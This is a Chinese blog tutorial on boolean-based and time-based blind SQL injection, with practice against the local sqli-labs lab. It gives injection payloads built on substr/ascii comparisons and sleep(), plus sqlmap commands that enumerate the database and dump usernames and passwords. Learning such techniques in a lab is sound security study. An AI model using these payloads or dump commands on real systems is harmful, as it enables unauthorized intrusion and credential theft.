基于布尔 基于时间的sql盲注

最新推荐文章于 2024-03-09 10:30:00 发布
最新推荐文章于 2024-03-09 10:30:00 发布
阅读量502 收藏
点赞数 1
分类专栏: web python开发
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41071646/article/details/87726917
版权

在上一博客 其实就已经讲到了  sql    

但是上一节 主要是有回显  页面中 会有很多 提示的信息  但是在实战中  这些东西 其实都不怎么存在的  这里  其实又分了 两种情况 

第一种 是基于 布尔  第二种 就是  基于时间的  盲注 

这两种   其实 都比较  简单     先说  基于 布尔的吧 

基于布尔的盲注 :

   其实这个很好理解  页面只会返回 0或1  我们可以 根据 页面是否 404  就可以判断  是否正确 

然后我们可以利用的函数 有   mid(striing,start,length)      substr(string,start,length)    left(string,length)  

然后 我们可以  正确性  来验证  库的长度 

 然后可以用 二分法 来 猜测  库的名字   表的名字  字段的名字  

然后可以 找到 最后的 用户名 还有密码   基本上可以用 

select length(database())

select substr (database())

select ascii(substr(database(),1,1))

select ascii(substr(database(),1,1))>N

select ascii(substr(database(),1,1))<N

select ascii(substr(database(),1,1))=N

如果要是 查找第二位 就是 第二位换成 2即可 

基于时间的盲注 则是  页面 0 1 也不会返回  

这个就是比较尴尬的一点 我们也不知道 我们是否注入成功了  那么 就可以  用一个函数 

sleep    用if 来判断 

例如 

if(ascii(substr(database(),1,1))=N,1,sleep(3)) 

这个语句的意思就是 当数据库名 第一个字母的ascii码 等于115  执行一次 sleep 函数 等待三秒  

这个  这个就和 布尔型注入差不多  人家是    看页面返回   0 或 1  来判断是否注入成功 

而  基于时间的盲注 就是 根据  等待的时间   来判断 

然后    就是靠二分法 一步一步的来猜  或者 用mysql  直接跑  这个也是可以的 

 虽然 可能跑的会非常慢 

这里是查询数据库 名字  

py -2  sqlmap.py -u "http://127.0.0.1/sqli-labs-master/sqli-labs-master/Less-9/?id=1" --technique T --dbs  --batch

查询表项  

py -2  sqlmap.py -u "http://127.0.0.1/sqli-labs-master/sqli-labs-master/Less-9/?id=1" -D security --tables --batch

然后这里是 查询字段 

py -2  sqlmap.py -u "http://127.0.0.1/sqli-labs-master/sqli-labs-master/Less-9/?id=1" -D security -T users --columns  --batch


 

然后就是   查询 

py -2  sqlmap.py -u "http://127.0.0.1/sqli-labs-master/sqli-labs-master/Less-9/?id=1" -D security -T users -C username,password --dump  --batch

pipixia233333
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SQL注入之基于布尔盲注详解
09-10
首先说明的盲注是注入的一种,指的是在不知道数据库返回值的情况下对数据中的内容进行猜测,实施SQL注入盲注一般分为布尔盲注和基于时间盲注。这篇文章主要讲解的是基于布尔盲注。下面来一起看看吧。
SQL布尔盲注
陈艺秋的博客
01-19 418
布尔盲注
SQL注入原理-布尔盲注
T1ngSh0w的博客
09-15 2063
SQL注入原理-布尔盲注+手写python脚本
SQL盲注-实战布尔盲注
dkxkl1314的博客
03-09 1368
环境:win10靶场:sqli-labs-master盲注就是在SQL注入过程中,SQL语句执行后,查询到的数据不能 回显到前端页面。此时,我们需要利用一些方法进行判断或者尝 试,这个过程称之为盲注。而布尔盲注就是SQL语句执行后,页面 不返回具体数据,数据库只返回0或者1(真or假)。类似于无法开口说话的人,只能通过点头和摇头来告诉你答案的正 确与否。在页面中,如果正确执行了用户构造的SQL语句,则返回一种页 面,如果 SQL语句执行错误,则执行另一种页面。
SQL注入-布尔盲注
acepanhuan的博客
02-10 1533
学习SQL注入方法之盲注
SQL注入原理及实践(一)–SQL注入布尔盲注
dulirongdudu的博客
08-02 2073
当不知道数据库返回值的情况下时【无回显】,输入1’and‘1’='1和1’and‘1’='2显示不一样,仅返回正确、或者错误的页面时,存在布尔盲注入。①if()if(条件,结果1,结果2)如果条件成立,则输出结果1,否则输出结果2。if(SUBSTRING(参数1,参数2,参数3),结果1.结果2)②字符串截取函数SUBSTRING(参数1,参数2,参数3)当假设长度为4时,返回正确的界面,因此数据库名为4位字符串。1’and‘1’='1为真返回正确的界面。.....................
sql布尔盲注
2203_75336412的博客
08-12 201
id=1' and (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)))>100--+页面返回有数据。id=1' and (ascii(substr(( select id users limit 0,1),1,1)))>30--+页面返回有数据。id=1' and 1=1 --+ 页面有返回?通过这个方法判断出整个数据库名。
sql注入 自学笔记 报错注入 二阶注入 布尔时间盲注 基于sqli-labs
02-19
sql注入 自学笔记 报错注入 二阶注入 布尔时间盲注 基于sqli-labs
超级SQL注入工具,支持布尔盲注,报错盲注,union注入等
最新发布
03-27
超级SQL注入工具(SSQLInjection)是一款基于HTTP协议自组包的SQL注入工具,支持出现在HTTP协议任意位置的SQL注入,支持各种类型的SQL注入,支持HTTPS模式注入。 超级SQL注入工具目前支持Bool型盲注、错误显示注入、...
Web应用安全:Sqlserver盲注.pptx
06-19
1、SQL盲注 什么是SQL盲注SQL盲注就是在 sql 注入过程中,sql 语句执行的选择后,选择的数据不能回显 到前端页面。此时,我们需要利用一些方法进行判断或者尝试,这个过程称之为盲注盲注分为三类: 1)基于...
网络安全原理与应用:SQL盲注.pptx
05-16
盲注分为基于布尔盲注、基于时间盲注以及基于报错的盲注 SQL盲注 二、SQL盲注布尔盲注) 知识点任务 通过SQL布尔盲注的方法获取admin的密码 1、检查是否存在注入点 2、猜解数据库名的长度 3、获取数据库名称 4...
SQL盲注篇之布尔盲注
weixin_47785246的博客
07-11 2973
简单介绍SQL注入中的盲注,通过靶场的练习,演示SQL盲注的一些常用方法与思路。
SQL盲注--布尔盲注
Auroraxsn的博客
04-27 2834
一、布尔盲注 1.特征: 某些网站输入参数后会判断,然后根据结果是或非返回页面。即普通注入只会返回其他页面,并没有回显 2.解决原理: 用函数(regexp,like,ascii,left,ord,mid,length)猜相关信息,正确时与错误时返回页面不一样,根据返回的页面来判断正确的数据信息。 3.基本流程 (1.判断注入类型 (2.判断列数 (3.获取数据库长度 构建有关数据库名的表达式,看页面返回情况判断表达式对错 length(str) 函数,返回字符串的长度 ...
SQL注入-盲注布尔盲注时间盲注
热门推荐
LJH1999ZN的博客
02-10 1万+
一、什么是盲注 盲注就是在sql注入过程中,sql语句执行select之后,可能由于网站代码的限制或者apache等解析器配置了不回显数据,造成在select数据之后不能回显到前端页面。此时,我们需要利用一些方法进行判断或者尝试,这个判断的过程称之为盲注。 通俗的讲就是在前端页面没有显示位,不能返回sql语句执行错误的信息,输入正确和错误返回的信息都是一致的,这时候我们就需要使用页面的正常与不正常显示来进行sql注入。 二、盲注的分类 基于布尔类型的盲注 基于时间类型的盲注 三、利用盲注
SQL注入布尔盲注完整解析
qq_28092985的博客
11-06 2011
这里写自定义目录标题注入原理实战利用函数解释sqli-labs-Less5初级使用(length + ascii + substr)进阶使用(length + ascii + substr + limit)总结 注入原理 布尔盲注在注入时无回显的情况下适用,原理是应用系统在根据where+and语句进行查询时进行布尔判断即结果真或假,例如select * from admin where id=1 and 1=1,一般查询中应用系统仅接受 id变量值去拼接sql语句进行查询,但使用过union联合查询的小伙
SQL布尔盲注 (Blind)基本原理及使用burpsuite进行暴力猜解
Welcome To Myon'Blog !
12-22 1565
SQL布尔盲注入是一种SQL注入攻击方式, 根据某个条件是否成立,来判断返回结果的真假,通过布尔盲注,攻击者可以逐个字符地推断出数据库中存储的信息,如用户名、密码等,从而获取敏感信息或者执行非法操作。什么情况下我们会采用盲注?我们平时最常用的是union联合查询注入,这是基于页面有数据回显的条件;但是,如果无论你输入什么,页面始终都只回显两种情况,我们可以把这两种情况看成是1或者0,也就是说,要么你查的东西有,要么不存在。面对这种只回显两种情况的,我们一般是采用盲注盲注可以分为时间延迟盲注布尔盲注
SQL注入(四):盲注布尔)+盲注时间)+宽字节+load_file
NSQ0207的博客
07-19 201
盲注布尔+时间 宽字节:使用%df load_file使用
SQL注入-无回显】时间盲注:原理、函数、利用过程
06-14 4951
SQL注入-无回显】
post基于布尔盲注
05-05
基于布尔盲注是一种常见的SQL注入攻击技术,可以通过构造特定的SQL查询语句来获取数据库中的敏感信息。在这种攻击中,攻击者通过向受攻击的应用程序中输入恶意的SQL代码来触发漏洞。 在基于布尔盲注中,攻击者...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值